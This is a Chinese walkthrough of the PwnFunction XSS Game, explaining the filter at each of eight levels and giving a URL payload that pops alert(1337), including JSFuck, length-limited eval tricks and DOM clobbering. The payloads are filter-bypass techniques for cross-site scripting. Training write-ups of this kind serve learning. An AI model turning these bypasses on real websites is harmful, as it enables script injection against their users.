xss GAME (xss漏洞攻击1-8)

目录

xss网页链接

第一关

第二关

第三关

​编辑第四关

​编辑第五关

​编辑第六关

第七关

[第一种 Function构建函数](#第一种 Function构建函数)

[第二种 tostring parseInt](#第二种 tostring parseInt)

[第三种 silce()](#第三种 silce())

[​编辑第八关(安全过滤框架 dom破坏)](#编辑第八关(安全过滤框架 dom破坏))


xss网页链接

XSS Game - Learning XSS Made Simple! | Created by PwnFunction

第一关

分析源码可知,没有任何过滤,那直接动手操作即可

而且有需求,不能有用户参与,而且必须弹窗1337

第二关

分析:innerText=ma 这个代码 将会把你输入的都将转换为文本

那么思考一下 绕过双引号 即可

?jeff=a";alert(1337);"

第三关

过滤了一些字符 用聚焦解决

?wey=1"%20οnfοcus="alert(1337)"%20autofocus="ture

第四关

?ricardo=javascript:alert(1337)

有setTIMEout 输入进去等待几秒即可

第五关

js不支持编码符号 但是支持字符串

所以location 可以转换字符串

url编码 为实体编码 然后执行

?markassbrownlee=<svg%20οnlοad=alert%26%2340%3B1337%26%2341%3B>

第六关

过滤了英文字母 所以直接没办法用英文

jsfuck 这个可以让字母变成 ![]

eval可以直接执行命令

JSFuck - Write any JavaScript with 6 Characters: []()!+

第七关

限制 0-50 所以上一关无法使用

有三种解法

第一种 Function构建函数

构建一个ALERT(1337) source 是获取函数原码 toLowerCase() 获取小写

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

第二种 tostring parseInt

首先得科普一下parseInt

parseInt,是Javascript内置函数,原型为parseInt ( String s , [ int radix ] ),用于解析一个字符串,并返回一个整数。

tostring 将数字转回为字符串

那么问题来了为啥要 tostring(30) 而不是29 或者 28 呢

alert 这个 t 必须到30进制才可以转换的到 例子:16进制最大是F

?mafia=eval(9875141..toString(31))(1337)

第三种 silce()

锚点

location.hash 获取url#后面的值 我们通过切片将alert切出来

?mafia=eval(location.hash.slice(1))#alert(1337)

第八关(安全过滤框架 dom破坏)

DOM破坏是一种将HTML注入页面以操纵DOM并最终改变页面上JavaScript行为的技术。

就是修改他原来的参数,进行覆盖,最后误以为是正确的

分析源码可知 ok 我们可以覆盖
我们可以得到两种标签对象: HTMLAreaElement (<area>) & HTMLAnchorElement (<a>) ,这两个
标签对象我们都可以利⽤ href 属性来进⾏字符串转换。
我这里使用a标签

?boomer=<a%20id=ok%20href=tel:alert(1337)>

?boomer=<a%20id=ok%20href=cid:alert(1337)>

这里用到了白名单 tel cid 因为javascript 不可以使用

相关推荐
REDcker2 小时前
个人博客网站建设指南 Markdown资产化与静态站选型部署
前端·后端·博客·markdown·网站·资产·建站
zhangfeng11332 小时前
小龙虾 wordbuddy 安装浏览器控制器 agent-browser npm install -g agent-browse
前端·人工智能·npm·node.js
徐小夕2 小时前
100小时,我做了一款AI CAD建模软件,开源!
前端·vue.js·github
Bigger2 小时前
因为看不懂小棉袄的画,我写了个 AI 程序帮我“翻译”她的世界
前端·人工智能·ai编程
送鱼的老默3 小时前
学习笔记--入门typescript直接案例开搞
前端·typescript
Prometheus3 小时前
从 XMLHttpRequest 到 fetch、ReadableStream、SSE、EventSource:前端流式通信完整梳理
前端
光影少年3 小时前
useEffect 完整理解:依赖数组、副作用清理、模拟生命周期
前端·react.js·程序员
之歆3 小时前
DAY_18深度解析:数据类型转换与运算符全攻略(上)
前端·javascript
大家的林语冰3 小时前
pnpm 11 发布,弃用 JSON 和 npm CLI,进化为纯 ES6 模块,新增 pnpm pack-app 等命令,供应链保护默认启用,要求 Node
前端·javascript·node.js
漓漾li4 小时前
每日面试题-前端2
前端·react.js·面试